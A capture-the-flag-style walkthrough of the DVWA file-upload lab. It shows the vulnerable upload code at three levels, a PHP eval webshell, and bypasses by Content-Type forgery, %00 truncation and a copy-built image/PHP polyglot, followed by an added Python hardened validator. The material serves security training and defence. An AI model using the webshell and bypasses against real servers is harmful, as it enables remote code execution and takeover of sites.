LOW:
The following code just performs the upload; there is no check of any kind.
<?php
if (isset($_POST['Upload'])) { // isset checks whether the Upload field arrived via POST
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename( $_FILES['uploaded']['name']);
    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    } else {
        echo '<pre>';
        echo $target_path . ' successfully uploaded!';
        echo '</pre>';
    }
}
?>
Write a PHP one-line webshell.
The password is 123; save it as 1.php:
<?php
eval($_POST['123']);
?>
Start the upload.
Upload path:
http://192.168.5.4/dvwa/hackable/uploads/1.php
Connect with Caidao (菜刀):
MEDIUM:
Code audit:
The following code checks the type of the uploaded file;
if the uploaded file's type is not an image, the upload is refused.
File Upload Source
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_type = $_FILES['uploaded']['type'];
    $uploaded_size = $_FILES['uploaded']['size'];
    if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' successfully uploaded!';
            echo '</pre>';
        }
    }
    else{
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
?>
Capture the request and change the file type to one that is allowed,
then send the packet again.
The upload succeeds. The medium level only checks the file type: whatever the extension, as long as the declared type is the one it expects, the file goes through.
HIGH:
As usual, code audit (see the figure):
The high-level script checks the extension of the uploaded file; as long as the extension meets its requirement, the file can be uploaded.
File Upload Source
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' successfully uploaded!';
            echo '</pre>';
        }
    }
    else{
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    }
}
?>
Two methods:
Method one: %00 truncation.
First, take 12.php, our webshell, rename it to 12.php.jpg, upload it and capture the packet.
Here we insert a 00 byte (add a 00; do not change the 2e to 00).
This %00 truncation only works on older PHP versions; it does not work on newer ones.
Upload failed.
Method two: an image webshell.
Prepare the one-line webshell and an image that opens normally.
Use the copy command:
copy 1.jpg/b+1.php/a 1.jpg
This yields a webshell image, 1.jpg; start the upload.
Then open the image so that it gets parsed:
http://192.168.5.4/dvwa/hackable/uploads/1.jpg
Connect with Caidao (菜刀):
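As an added example (not DVWA's code, and not part of the original write-up), the medium and high checks above are re-implemented in Python next to a hardened validator that closes the gaps all three levels leave: it rejects null bytes and double extensions in the name, whitelists the extension, checks the file's real signature instead of the client-sent Content-Type, scans for PHP open tags so a copy-built polyglot like 1.jpg is caught, and stores the file under a random name. The sample inputs are constructed, not real uploads.

```python
import re
import secrets

JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED = {"jpg": JPEG_MAGIC, "jpeg": JPEG_MAGIC, "png": PNG_MAGIC}
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)  # matches "<?php" and "<?="
MAX_SIZE = 100000  # DVWA's own size limit

# Constructed samples (not real files): a minimal JPEG-like header, a PHP file,
# and the two glued together the way "copy 1.jpg/b+1.php/a" does.
FAKE_JPEG = JPEG_MAGIC + b"\x00\x10JFIF\x00" + b"\x00" * 32
PHP_FILE = b"<?php phpinfo(); ?>"
POLYGLOT = FAKE_JPEG + PHP_FILE

def medium_check(declared_type: str, size: int) -> bool:
    """Medium level: trusts the client-sent Content-Type, which the client can forge."""
    return declared_type == "image/jpeg" and size < MAX_SIZE

def high_check(filename: str, size: int) -> bool:
    """High level: inspects only the text after the LAST dot, so 12.php.jpg passes."""
    ext = filename.rsplit(".", 1)[-1]
    return ext in ("jpg", "JPG", "jpeg", "JPEG") and size < MAX_SIZE

def hardened_check(filename: str, content: bytes) -> list[str]:
    """Server-side checks the three levels lack. Returns the rejection reasons;
    an empty list means the upload is acceptable."""
    problems = []
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]  # basename
    if "\x00" in name:
        problems.append("null byte in filename")
    if name.count(".") != 1:
        problems.append("filename must be exactly <base>.<ext>: no double extensions")
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    magic = ALLOWED.get(ext)
    if magic is None:
        problems.append(f"extension {ext!r} not in whitelist")
    elif not content.startswith(magic):
        problems.append(f"content does not carry the {ext} signature (Content-Type ignored)")
    if PHP_TAG.search(content):
        problems.append("PHP open tag inside the file: image/script polyglot")
    if len(content) >= MAX_SIZE:
        problems.append("file too large")
    return problems

def stored_name(ext: str) -> str:
    """Never keep the client's filename: random name, whitelisted extension only."""
    return secrets.token_hex(16) + "." + ext.lower()
```

Even with these checks, the upload directory should be served with script execution disabled (or kept outside the web root), since the polyglot only does harm where something parses it as PHP.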